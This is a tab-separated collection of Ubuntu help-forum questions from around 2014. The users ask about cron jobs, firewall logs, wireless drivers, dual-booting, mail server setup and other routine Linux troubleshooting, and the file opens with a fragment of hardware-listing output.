unclaimed description : network controller product : bcm43228 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:25:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d4000000-d4003fff *-network description : wireless interface physical id : 2 bus info : usb @ 3:4 logical name : wlan0 serial : e8:4e:06:14:40:06 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2800usb driverversion=3.5.0-17-generic firmware=0.29 ip=192.168.0.102 link=yes multicast=yes wireless=ieee 802.11bgn
417122	running php cron job with arguments	im trying to run a php script , once a day , on ubuntu 13.10 server with php5 . i have cron jobs set up , via ajenti control panel , verified with crontab -l , for this command . php /path/script.php site_id=2 table=clicks i have been adjusting the time while trying to get it to run , but basically i want to run it at 2am . 0 2 * * * i have tried running the script directly , running it via /usr/bin/php , /usr/bin/php5/ , and php , and nothing ever leaves a trace in syslog , or the apache log or error files ( trace level 8 ) i was trying to run it at 2am , so i set it that way , but running a date on the terminal shows the current time as thu feb 6 07:44:29 utc 2014 i have tried running the cron jobs at 7something am too , and again , nothing runs . any ideas ? besides syslog , is there any ubuntu logging for cron jobs , to see if they run or do n't and why ? also , is that the proper way to send arguments ? does the script need to accept them any differently than a web based script ?
417123	am i under attack ?	when i checked my log viewer , i noticed that ufw is blockng many ips that i 'm not familiar with ! i have only three computers in my local network at the time when i was checking my log viewer i was only running one pc the other two were closed , also i have qbittorrent installed in but even when it 's closed the blocking of this strange ips keeps on and on ! so i need help to figure this out , could you please help me ! this is sample of the log , please note the src= ... and how the ips are changing each time ! feb 6 10:36:47 kernel : [ 4483.535580 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=173.194.35.96 dst=192.168.1.2 len=40 tos=0x00 prec=0x00 ttl=50 id=63946 proto=tcp spt=443 dpt=49390 window=0 res=0x00 rst urgp=0 feb 6 10:36:47 kernel : [ 4483.550561 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=173.194.35.96 dst=192.168.1.2 len=40 tos=0x00 prec=0x00 ttl=50 id=63947 proto=tcp spt=443 dpt=49390 window=0 res=0x00 rst urgp=0 feb 6 10:36:49 kernel : [ 4485.451947 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=173.194.70.84 dst=192.168.1.2 len=40 tos=0x00 prec=0x00 ttl=47 id=26086 proto=tcp spt=443 dpt=45573 window=0 res=0x00 rst urgp=0 feb 6 10:37:07 kernel : [ 4503.589763 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=86.90.23.194 dst=192.168.1.2 len=131 tos=0x00 prec=0x00 ttl=54 id=46228 proto=udp spt=63799 dpt=6881 len=111 feb 6 10:37:09 kernel : [ 4505.436512 ] [ ufw block ] in=teredo out= mac= src=2001:0000:9d38:90d7:30aa:09f8 : a6de : fe07 dst=2001:0000:53aa:064c:3449 : d78a : a642 : b06c len=72 tc=0 hoplimit=128 flowlbl=0 proto=tcp spt=38331 dpt=6881 window=8192 res=0x00 syn urgp=0 feb 6 10:37:28 kernel : [ 4525.061666 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=71.173.19.14 dst=192.168.1.2 len=134 tos=0x00 prec=0x00 ttl=116 id=16433 proto=udp spt=37115 dpt=6881 len=114 feb 6 10:37:34 kernel : [ 4530.489483 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=173.194.35.126 dst=192.168.1.2 len=40 tos=0x00 prec=0x00 ttl=50 id=46264 proto=tcp spt=443 dpt=48085 window=0 res=0x00 rst urgp=0 feb 6 10:37:46 kernel : [ 4542.565319 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=111.206.125.219 dst=192.168.1.2 len=120 tos=0x00 prec=0x00 ttl=39 id=0 df proto=udp spt=34207 dpt=6881 len=100 feb 6 10:37:52 kernel : [ 4548.637274 ] [ ufw block ] in=teredo out= mac= src=2001:05c0:1400:000a:0000:0000:0000:0c39 dst=2001:0000:53aa:064c:3449 : d78a : a642 : b06c len=78 tc=0 hoplimit=123 flowlbl=0 proto=udp spt=28768 dpt=6881 len=38 feb 6 10:37:55 kernel : [ 4551.519196 ] [ ufw block ] in=teredo out= mac= src=2001:05c0:1400:000a:0000:0000:0000:0c39 dst=2001:0000:53aa:064c:3449 : d78a : a642 : b06c len=78 tc=0 hoplimit=123 flowlbl=0 proto=udp spt=28768 dpt=6881 len=38 feb 6 10:38:01 kernel : [ 4557.832730 ] [ ufw block ] in=teredo out= mac= src=2001:05c0:1400:000a:0000:0000:0000:0c39 dst=2001:0000:53aa:064c:3449 : d78a : a642 : b06c len=78 tc=0 hoplimit=123 flowlbl=0 proto=udp spt=28768 dpt=6881 len=38 feb 6 10:38:08 kernel : [ 4564.966546 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=92.46.77.51 dst=192.168.1.2 len=134 tos=0x00 prec=0x00 ttl=111 id=14597 proto=udp spt=17851 dpt=6881 len=114 feb 6 10:38:26 kernel : [ 4582.324206 ] [ ufw block ] in=teredo out= mac= src=2001:05c0:1400:000a:0000:0000:0000:0c39 dst=2001:0000:53aa:064c:3449 : d78a : a642 : b06c len=68 tc=0 hoplimit=123 flowlbl=0 proto=tcp spt=59992 dpt=6881 window=8192 res=0x00 syn urgp=0 feb 6 10:38:28 kernel : [ 4584.203917 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=111.250.83.156 dst=192.168.1.2 len=134 tos=0x00 prec=0x00 ttl=48 id=41676 proto=udp spt=56696 dpt=6881 len=114 feb 6 10:38:46 kernel : [ 4602.737591 ] [ ufw block ] in=eth0 out= mac=00:23 : ae : a8 : a1:32 : b0:48:7a : a3:3f : a5:08:00 src=81.155.77.146 dst=192.168.1.2 len=131 tos=0x18 prec=0x60 ttl=112 id=12922 proto=udp spt=33574 dpt=6881 len=111
417130	ralink 3290 on ubuntu 12.04 lts	i just bought a notebook hp 4540s , with card ralink 3290 . i installed ( dualboot with windows 7 ) ubuntu 12.04lts . bluetooth , wifi and internet key is not working . i read that with ubuntu 13:10 and a new kernel the problem has been resolved . i already tried to do the upgrade at 12:10 . result : black screen and pc out of use . i had to reinstall 12:04 lts , so i 'm afraid to install 13:10 . 12:04 is a versione lts . the problem will be solved in the future also for this version ? thank you mirko
417136	notify me when a ltsp client inserts a usb	i want a script/software to notify when an usb is connected to ltsp client machines . how to show notification when a usb device is inserted ? this question has an answer but for ubuntu version < 12 . 04 which is my case . in addition i want to use with ltsp clients which means it needs some more configurations .
417143	wifi-networks disconnected xubuntu	i recently installed xubuntu and i tried to create a wifi hotspot using hostapd , but was in vain . after that i started having issues connecting to wireless networks . my wired network works fine . but when i look for any wifi networks , it ends up showing wi-fi networks disconnected even though there are many wifi-networks . here is a screen-shot of how it was looking : . edit : here is how my /etc/network/interfaces looks like : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback and here is my /etc/networkmanager/networkmanager.conf : [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=true and rfkill list shows the following : 0 : phy0 : wireless lan soft blocked : no hard blocked : no please help . thank you .
417144	login screen issues	i realize that the title is a little ambiguous , but bear with me . i 'm having problems with my login screen displaying a user account that should be hidden . the user 's name is marked as light display manager on the login screen . this only seems to happen when first logging into the computer after boot , and the user is gone next time i log out . this problem is accompanied by an issue with the desktop environment chooser not updating it 's position upon the installation of a new desktop environment , causing some of the choices to go off the bottom of the screen and be unreadable . from what i can tell , this issue was caused by the log in screen crashing when i tried looking into the remote login feature . because the problem is seen on the login screen , and i ca n't replicate the issue in a virtual machine , i have no screenshots to help explain the issue . does anyone know how to `` reset '' the login screen to it 's defaults so that these issues wo n't occur anymore ?
417145	ubuntu server 12.04 - teamviewer - resolution monitor	i installed ubuntu 12.04 server on my old pc . i installed teamviewer and it is working correctly until i disconnected monitor that i used during the installation . now when i connect to my pc the resolution is 640x480 and i ca n't work correctly with this resolution . how can i fix this ?
417147	how to recover free space after installing ubuntu 12.04	i have a sony vaio laptop with 320gb hdd and 3gb ram . it came with windows 7 . i chose to install ubuntu 12.04 . at the time of installation of ubuntu i did partition as follows . ntfs - 14 gb ( windows 7 recovery ) ntfs - 140 mb ( windows 7 loader ) swap area - 1.5 gb ext4 - 162 gb ( / ) free space - 142 gb now after installation it only shows 149 gb of free space inside /home . how do i recover the free space of 142 gb ? and how do i allocate it ? do i have to reinstall the os if i need to recover it ?
417150	how to enable notifiction `` action to choose '' after auto-mounting in nautilus	i have ubuntu with gnome . the window informing about usb auto-detection ( action to choose ) always occurs when usb drive was plugged . after removing ~/.config directory it stopped working . how to recover this feature ? i do n't remember , but it supposed to be nautilus notification . usb device is ok and is visible via lsusb . auto-mounting also works . i do n't see an option for this in gconf-editor and nautilus .
417155	public folders in dovecot on ubutu 12.04 server	im trying to get a `` public '' mailbox to collect generic emails like sales @ , info @ etc , ive followed the guide on the dovecot page , making sure i was following the wiki for dovecot2 but i cant for the life of me getting it working . this is the relevant part of 10-mail.conf namespace { type = public separator = / prefix = public/ location = maildir : /var/vmail/public subscriptions = yes inbox = no } plugin { acl = vfile } and the contents of public root @ server : /etc/dovecot/conf.d # ls -lah /var/vmail/public/ total 12k drwxr-xr-x 2 vmail vmail 4.0k feb 5 17:18 . drwxr-xr-x 4 vmail vmail 4.0k feb 5 17:28 .. -rw-r -- r -- 1 root root 10 feb 5 17:18 dovecot-acl lrwxrwxrwx 1 root root 9 feb 5 17:12 info - > info/ and dovecot-acl : anyone lr when i connect via imap it doesnt find any folders under public to subscribe to
417156	no disk space confusion	i am trying to install kde on ubuntu server , when i run apt-get install kubuntu-desktop the cp command says i have no space : complete output of the above command : here other info : the os runs on an esx server .
417160	what is a backend in computer graphics	i am trying to understand what does backend actually mean.. i was going through wayland manual page on ubuntu . i was able to find a few lines like this.. '' the drm backend uses linux kms for output and evdev devices for input . it supports multiple monitors in a unified desktop with dpms . ''
417161	eclipse kepler hangs on slpashscreen ubuntu 13.10	i just installed eclipse kepler on ubuntu 13.10 following those instruction but my eclipse just hangs on the splashscreen turning gray , no workspace directory created , no error shown i got jdk 7 installed anyone can help ?
417163	show error not mount driver after start computer	after start computer show error not run ubuntu .
417167	configuring name servers on 12.04	i want to create nameservers on my ubuntu 12.04 dedicated server by name servers i mean ns1.mydomain.com ns2.mydomain.com i am following this guide but it is bit confusing for me as i have never used ubuntu as webadmin . any guide on how to do it ?
417168	long time in install	second step of ubuntu 13.10 of installation my take long several time . and this step could not be skipped . is it normal ?
417169	how to disable super+space key in unity ?	after a recent update ( or maybe i missed that somehow ) unity does not allow to use super+space key now . instead it shows a language swithing box in the middle of the screen . i could n't find this in keyboard settings , shortcuts . any way to disable it ?
417176	geny motion - trick to download the .ova files for ubuntu 12.04 ( old links are not working )	i 'm using the ubuntu 12.04 lts version . i had also installed the genymotion . but i had a slow internet connection , so i 'm unable to download that large size file in my home . i had searched many many blogs , sites too.. where they are provided the link to download the .ova files , but if we try to download means the 404 error comes . where as for some .ova files we can download but majority of the .ova files are not getting . so i want to get the .ova files and the links and the way to download them in net cafe .
417177	is there a ppa to get the latest mono and monodevelop versions ?	i need to program dot net apps via ubuntu , so where can i get them because i always failed to compile the source ? ?
417187	which nvidia card for a 3 monitor / one card setup	i never had problems with ubuntu and nvidia cards . but since i switched to an amd hd7950 card i 'm very unhappy with my system . the reason for switching to amd was the dream of having 3 monitors running with one card . but that worked only a short time . now the driver does not accept 3 monitors anymore . ( not enough video memory ) . i have problems with wakeup after sleep mode . i have problems playing video , i have ... well many problems that i did n't have with nvidia . so for me it 's time to go back to nvidia . but with a 3 monitor setup . the question is : which nvidia card supports 3 monitors and works well with ubuntu . i googled around but did not find any hardware support list for a 3 monitor setup . so if anyone has a working setup , please let me know . btw . i 'm not a gamer . the only thing i like to `` game '' is flightgear . and it would be a great dream to do that on 3 monitors . but the main reason for 3 monitors is developing . 1 for browser , one with the ide and another one for a terminal etc ...
417190	ide for lpc 2148	i am working on amr-7 i.e . lpc 2148. but i did n't get any ide for lpc 2148. also i need a software which dowload a developed code to the arm .
417192	lenovo s10-3 xubunutu wireless is disabled by hardware switch	so i just got rid of windows 7 starter and installed xubuntu 12.04 but the network manager after trying to enable wireless says wireless is disabled by hardware switch i have googled around and found no solution . rfkill list says 2 : phy0 : wireless lan hard blocked : yes and rfkill unblock all does n't do anything . i am also 100 % sure my switch on the machine is turned on and the fn+f5 combination does n't fix it either . i have tried bios reset with no luck and rearranging the boot order with also no luck . the only way i can connect to the internet on this machine is through usb smartphone wifi , i think the cable port is broken . i have also tried with no luck so far : sudo rfkill unblock all rmmod ath5k & & modprobe ath5k rm /dev/rfkill sudo iwconfig wlan0 txpower auto i 'm kind of stuck now and do n't know what else to do , my last idea is to reinstall windows 7 just to turn this wifi back on but that 's the last thing i 'd want to do . thanks .
417195	wired network not showing edited connections	i 'm using ubuntu 12.04 lts . recently my isp changed my mac address and i changed it accordingly from `` edit connection '' . but after editing the mac address of an existing connection it no more appears in the wired network list . if i add a new connection it does n't appears in the list . how can i bring a connection to the wired connection list ?
417198	c++ passing by reference programming	write a c++ program that incorporates two user-defined functions using parameter passing and performs addition and subtraction of two numbers . both the input and output are carried in the main function . the function prototype , function definition and main function should be in separate files i am having a problem writing this code any help ? # include < iostream > using namespace std ; void summation ( int , int ) ; //addition pass by reference void subtraction ( int , int ) ; //subtraction pass by reference int main ( ) { int num1 , num2 ; cout < < `` enter the first number : `` < < endl ; cin > > num1 ; cout < < `` enter the second number : `` < < endl ; cin > > num2 ; cout < < `` the sum is : `` < < summation ( num1 , num2 , ad ) < < `` the subtraction is : `` < < subtraction ( num1 , num2 , sub ) < < endl ; return 0 ; } void summation ( int & num1 , int & num2 , int & ad ) { ad = ( num1+ num2 ) ; } void subtraction ( int & num1 , int & num2 , int & sub ) { sub = ( num1- num2 ) ; } error occurs telling me both ad and sub have not been declared
417199	can i hide launcher only when the browser is running . ubuntu 13.10	i want to hide launcher only when google chrome is running . how can i do that ?
417200	toshiba estudio 167 will not print	ubuntu 12 and 13.04 , i can easily find and install my network printer toshiba estudio 167 and even print a test page . but when trying to print something else it says no response from printer , as if it is not connected !
417202	server 12.04 install	i have a ubuntu server 12.04 32bit os that is running both a dns and a web sever . i am wanting to add a mail server to the same tower . is there a way to do so without a full re-install ?
417204	intel extreme graphics ii drivers and ubuntu 13.10	not sure if anyone can help , but i 've put together an older pc that has on-board graphics , which according to the documentation is intel extreme graphics 2 . anyway ubuntu 13.10 ( 32-bit ) installed fine but when i log in , no unity at all and i 'm just left with the background wallpaper . i 've followed a number of related posts on resetting unity etc , all to no avail . i did install unity-2d and that seems to work - though quite slow and graphics appear low-res . when i look at the graphics on the info tab is tells me that 's it 's unknown/fallback . so i went to the intellinuxgraphics.org site and found the drivers for the extreme graphics 2 and followed the instructions to the letter which appeared to install fine , software pre-checks all suggested everything was ok and when advised to reboot i did . however now that is done , i log back in with the same problems as before and when i check the info screen the graphics still say unknown/fallback . i 'm a bit lost now on what to try next . as i said , i followed so many posts on resetting unity , dconf etc all to no avail and i suspect until i get this driver recognised properly by the system i wo n't get the rest to work . i 'm sure when and if i do the rest will sort itself out .
417205	how to clear history on a webview component ?	i am writing a small application containing a webview component . the final app should work in a kiosk setup , so i need to clear everything in between different sessions , in particular the navigation history . is this possible in qml at all ?
417212	inkscape with textext	i am trying to install the package textext on ubuntu , such that i can type latex in certain gaphs . i followed these instructions , but when i open inkscape i do not have the option latex in the extensions menu ... can anyone help me diagnose this problem ?
417215	how does kernel support swap limit ?	when i run docker info command on my ubuntu 13.04 with kernel 3.8.0-19-generic i got a warning `` no swap limit support '' . how can i solve this ? docker info containers : 10 images : 37 driver : aufs root dir : /var/lib/docker/aufs dirs : 59 warning : no swap limit support
417223	reassigning su command	i accidentally linked my `` su '' command to sublime text binary ( that 's what you get when you trust hitting tab without looking ... ) now , `` su '' just opens a sublimetext session . does anybody know how can i revert to the previous version and point `` su '' to what it is supposed to be pointing at ? thank you ! edit : the command that was accidentaly issued was sudo ln -s /opt/sublime\ text\ 2/sublime_text /usr/bin/su
417224	lenovo xubuntu wireless network not detected	i have lenovo s10-3 and xubuntu 12.04 . when i turn on wireless network manager can not find and networks . any solution ? thank you
417226	login screen not appearing after removing kde	i 've been using ubuntu 13.10 for about a month now . i decided to give kde a test run . unfortunately , it installed the kde login screen with it . i could n't stand it , so i spent about half an hour trying to restore the original one . nothing worked , until i went in through synaptic and removed most kde packages installed . bad idea . now , when i boot the computer , i am greeted with a black screen . and by that , i mean the screen has turned off completely . i am able to navigate to a virtual terminal using ctrl+alt+f1 . here 's the interesting thing ; when i go to tty7 , plymouth is still running . i go to tty8 , and my screen turns off again . is there a way i can fix this and get the old login screen back , or is it time to start the preparations for a re-installation ? thanks !
417230	do some action when some command is executed !	i want to write a script which can capture every command entered by the user in terminal and then do some things depending upon the command entered : for example : if user enters $ > firefox i would like to automatically start some services such as postgresql apache2 and apache-tomcat so i will provide command-names as test-cases and then i can do the different actions ! how can i do it on ubuntu ?
417231	is there anywhere you can get a super key for the keyboard ?	like , a physical key to swap the windows start key with the ubuntu super key ? is there anywhere i can buy such a thing , or have i gone to the wrong place and asked ? : p
417234	grabbing a pdf from studysoap	i have purchased an ebook from studysoap.com . however the only form i can access the file is through their web site which is far from convenient . the link looks like `` http : //www.studysoup.com/readers/xxx '' , where xxx stands for book id on the website . is there any easy way i could grab the book as pdf ? maybe command line can be helpful ? saving from within the browser does n't work , grabbing the link from web pdf downoladers saves the main page , not the pdf file itself . i have checked mozilla cache , it saves individual png pages throughout 20 folders without any order..
417235	3g modem visible only on fresh start	i 'm experiencing very weird behaviour with my 3g modem ( usb ) . it works only if i will plug it when my computer is turned off and then turn it on . if i do so , the modem works perfectly fine . when i attach my modem while computer is already working or wake the computer from hibernation/suspension , the modem is not working . how can i get it to work in these situations ? is there a way to force it being discovered by the system ? i use linux mint 16 , but had the same problem on ubuntu 13.04 . the modem is huawei e173 , lsusb gives : bus 003 device 004 : id 12d1:1436 huawei technologies co. , ltd. e173 3g modem ( modem-mode )
417236	editing ubuntu official documentation pages	maybe i wasn’t rigorous enough in reading the page , but i can’t edit the ubuntu wiki official documentation . i logged in using my ubuntuone account and using my launchpad account but still i can’t edit the page . let us take an example on this page : https : //help.ubuntu.com/community/mpichcluster i found an error in the keychain set code instruction on mpich cluster arrangement . the instruction asks us to put some code in the ~/.bashrc file . it was written as : if type keychain > /dev/null 2 > /dev/null ; then keychain -- nogui -q id_rsa [ -f ~/.keychain/ $ { hostname } -sh ] & & . ~/.keychain/ $ { hostname } -sh [ -f ~/.keychain/ $ { hostname } -sh-gpg ] & & . ~/.keychain/ $ { hostname } -sh-gpg we should add fi to complete this code . otherwise it will give us error . i want to add that fix . i also want to add a comment that this action should be done in the master machine , not in the helper machine ( i prefer to use “helper machine” instead of “slave machine” ) . maybe somebody can help to do this . thank you
417239	why is russian layout not working ? i can type no characters by pressing keys , only numbers	i use ubuntu 12.04 . i added following keyboard layouts to the default english layout : czech , slovak and russian ( by adding layout in keyboard layout settings ) . czech and slovak layouts are working fine ( i use alt+caps shortkey to switch between layouts ) . russian layout is not working - when i pres a character key , no character appears , neither latin nor russian . i can only write numbers . anyone knows how to resolve this ? thanks !
417243	using auslogics on wine	i 'm installing auslogics in my laptop to run it with wine . when i try to defrag disk or flash disk , it says unable to access the drive . try rebooting and running defragmentation again how can i configure wine to allow this program to access hard disk or flash drive ?
417245	how to start / stop a process using a .sh file ?	i think my confluence page died and the process stopped working . i want to restart it , how to do that using these files : start-conlfuence.sh stop-confluence.sh google has n't helped so far , and i tried to simply run the files by entering start-confluence or start-confluence.sh without success . i am running ubuntu 12.04 server .
417248	xubuntu 13.10 : i have to choose beteen : no sound vs no shutdown	i 'm running on xubuntu 13.10 64 bit . i have a funny issue , i 'm currently laughing : ) i have similar issue to this . and yes i was able to solve it by run=yes , otherwise , i will not be able to shut down xubuntu . however , when i do so , i will have no sound , i will have similar issue to this , and guess what , to solve it , i have to set run=no . so damn funny ! having to choose between never being able to shut your system down vs never being able to hear a sound ! not sure if this is a question or a voting poll : )
417251	find -exec not working properly , why ?	i am trying to list all the file names ( the basename , not the full path ) below my home directory using find . i tried to do : find ~/ -type f -exec echo $ ( basename `` { } '' ) `` ; '' however i end up having a list of full paths , and not only of the basenames as i would like . i now use echo , but ideally the result of $ ( basename `` { } '' ) should be the argument of some other function i want to write . why is the basename function not applied correctly ?
417252	`` w : failed to fetch gzip : /var/lib/apt/lists/partial/ '' when i run apt-get update	i have the following error when i do apt-get update ign http : //ppa.launchpad.net/precise/maintranslation-en fetched 1 b in 7s ( 0 b/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/au.archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en e : some index files failed to download . they have been ignored , or old ones used instead . ubantu 12.04 attempt to fix software centre - > other sources - > and tried to find the source the //ppa.launchpad.net/precise/maintranslation-en but it was n't listed ? how do i fix this error and remove any index files that can not load ?
417255	ubuntu 12.10 failing to boot during installation from usb in uefi mode	i have been trying to install ubuntu 12.10 ( 64 bit ) in my new laptop which has windows 8 already installed . initially the usb is booted using efi . but after i select either `` try ubuntu '' or `` install ubuntu '' , a blank screen appears . after searching about that i included nomodeset option . then it tries to boot , but hangs in between the process . the last few lines of the output are *stopping system v runlevel compatibility [ ok ] *stopping anac ( h ) ronistic cron [ ok ] and it 's in the same status after which i am forced to shutdown the system .
417259	mtp connection in ubuntu 13.10 without no usb 3.0	in this post i read that ubuntu 13.10 does recognize my phone , but only if it has a usb 3.0 port . is that correct ? my computer has only 3 usb ports and all are 2.0 . it is a dell vostro 3500 . when i run the command : $ mtp-detect i get the following answer : unable to open ~/.mtpz-data for reading , mtpz disabled.libmtp version : 1.1.6 listing raw device ( s ) no raw devices found . i installed everything ( from mtp to gmtp ) , and tried all the solutions i found in web , but nothing until now . hope someone can help me .
417260	dual boot windows 8.1 and ubuntu on a hybrid drive via liveusb	i have been meaning to dual boot ubuntu 13.10/12.04 ( or linux mint 16 ) along side my windows 8.1 . i have a lenovo u410 with a hybrid drive ( 30 gb ssd for cache , 750 hdd ) . i found it really difficult to do so . my bios has something called uefi mode ( dunno really what that is ) and while reading around , i understood that might cause some problems to a certain extent . things i have tried : boot via flash drive created with pendrivelinux made an ext4 partition on my hdd start the installer ubuntu did not see any other os installed was able to install it only on my ssd after i created a partition table on it . i thought to myself that probably installing on the ssd should be fine , especially since i do not need more than 30gbs since i want to use it especially for scripting/developing . unfortunately , after i have done so , ubuntu booted , but my windows refused to boot at all . it was probably given the fact that the cache was 'corrupt ' with ubuntu . i then tried to install ubuntu via wubi . it booted up okay , i can now dual boot . however , my windows performance drastically reduced since i installed ubuntu via wubi . this happened to me in the past on some other laptop , but after i managed to partition it properly , everything was back to normal . any thoughts on how i should go about this ? i really want ubuntu since i find developing in it so much smoother than in windows .
417261	ca n't uninstall klibc-utils	i 'm beginer of the linux and i have got the following problem on ubuntu 12.04 . when i 'm trying to uninstall the klibc-utils , i get the following error . the following packages have unmet dependencies : cron : depends : adduser but it is not going to be installed upstart : depends : initscripts depends : mountall depends : ifupdown ( > = 0.6.10ubuntu5 ) e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . as i 'm beginner in linux os , i have the following questions : how to solve this ? is the problem serious ?
417262	how can i install open office ?	i have install apache_openoffice_4.0.1_linux_x86_install-deb_en-us.tar.gz in ubuntu13.10 using tar.gz file but no errors , now i am not able to start the open office service . i do n't find it in application also . how can i install open office ?
417269	is linux secure remix an official ubuntu derivative ?	i found this page about linux secure remix in help.ubuntu.com . it suggests that this is a more advanced version of ubuntu for dual boot running ubuntu alongside windows . my question is whether its site is authentic ? and is this an actual version of ubuntu or a fake ? does ubuntu authenticate this site ?
417271	uninstalled unity and installed lubuntu ; now its showing : failed to load session ubuntu ; none of the given solutions working	i uninstalled unity using sudo apt-get remove unity unity-2d unity-2d-panel unity-2d-spread unity-asset-pool unity-services unity-lens-files unity-lens-music unity-lens-applications gir1.2-unity-5.0 unity-common indicator-sound indicator-power indicator-appmenu libindicator7 indicator-application indicator-datetime indicator-messages libnux-2.0-0 nux-tools libunity-misc4 unity-2d-common then i installed lubuntu using : sudo apt-get install lubuntu-desktop it was a long process and after it finished i shut down the pc . now when i try to log in to ubuntu , it says failed to load session ! i tried this in tty1 : sudo apt-get update sudo apt-get install ubuntu-desktop sudo apt-get install -f install sudo dpkg-reconfigure ubuntu-desktop sudo reboot but these did n't work ! i guess that happened because of no internet connection but how do i connect to tata photon+ when i am unable to login ? if nothing , how can i at least save the files in ubuntu ? i have windows xp installed besides ubuntu . is there a way i can save my files ?
417274	ubuntu 13.10 software center wont open	software center will not start for me . i have ran the following commands and none of them have worked . $ sudo apt-get update $ sudo apt-get upgrade $ sudo apt-get install software-center sudo apt-get install -- reinstall python2.7 sudo apt-get install -- reinstall ubuntu-desktop all of this to no avail . here is the read out when i run software-center directly from terminal . ryan @ ryan-satellite-m645 : ~ $ software-center 2014-02-06 10:49:50,435 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-02-06 10:49:50,488 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2014-02-06 10:49:50,488 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 74 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 this happened after i installed setup-tools and i tried to install wireshark from the software center .
417275	need to stop cairo desktop popping up on start up	there is a small window that pops up during start up . it is in the lower left hand corner of desktop on ubuntu 13.10 . it has a picture of an window that i have open and a # 1 inside the window . its approx . one inch in size . i can hit show desktop and it goes away . im trying to get rid of it on startup .
417277	unable to locate vlc package in my repositories ?	when i try to install vlc using apt-get , i get the following error : parameswaran @ parameswaran-compaq-presario-cq61-notebook-pc : ~ $ sudo apt-get install vlc [ sudo ] password for parameswaran : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package vlc it 's happening in my ubuntu i386 compaq presario cq61 , and i 'm new ubuntu user . somebody please tell me how to solve this issue and install packages in my laptop ?
417286	how can i mount software raid drive mdx with fstab	i have raid5 configure with gpt partition to allow working with drive larger the 1.6 tb ubuntu version is 12.04 and the md drive is 5tb . with : mount -t ext3 /dev/md129 /images mount works fine . but when i tried to put the same configuration to /etc/fstab : /dev/md129 /images ext3 default 0 0 i get this error at boot : mount : wrong fs type , bad option ... . what i 'm doing wrong or what i need to do to make it work ?
417295	how to take a screenshot and then upload the image to imgur through terminal ?	i do n't like the gui way of taking screenshot , uploading it to imgur and get the uploaded link . so what can i do to take a screenshot of my ubuntu desktop , upload the screenshot to imgur.com and then get back the uploaded link from terminal ? all i have to do from terminal .
417296	how can i adjust subtitles in totem ?	how do i adjust subtitles in totem player so that i can forward or delay it ?
417301	can i backup only if on a given network ?	i 'm using the backup utility included in the system to backup my laptop to a nas at home . however , when i 'm outside home , on another network , my system try to reach my nas a pop a window telling it can not reach it . would it be possible to get backups triggered only when i am on a given network ?
417305	not authorised to perform polkit action	i 'm new to ubuntu . i have installed ubuntu 13.10 and every time i connect a removable media i keep getting the error not authorized to perform operation ( polkit authority not available and caller is not uid 0 ) this forces me to mount the media manually on the terminal . when i try connecting to the a wi-fi network i get an error : not authorised to perform action when i try instaling an application from the software centre or updating the system using update manager the dialog box showing progress hangs on waiting for authentication and does n't continue or give an error . after reading about polkit i think that the problem would be how to automatically startup polkit after boot but i '' m not really sure how to do it in startup applictions . please advice
417306	my windows 8.1 installation is not being detected	ubuntu dvd installation is not detecting my windows 8.1 during installation . why is this ?
417311	install .bin file without using command line	i have a .bin file that i would like to install . when i download the file and click on it within firefox it tells me to `` choose an application '' to open it with . which application do i choose ? as the title says , i would like to do this without using the command line .
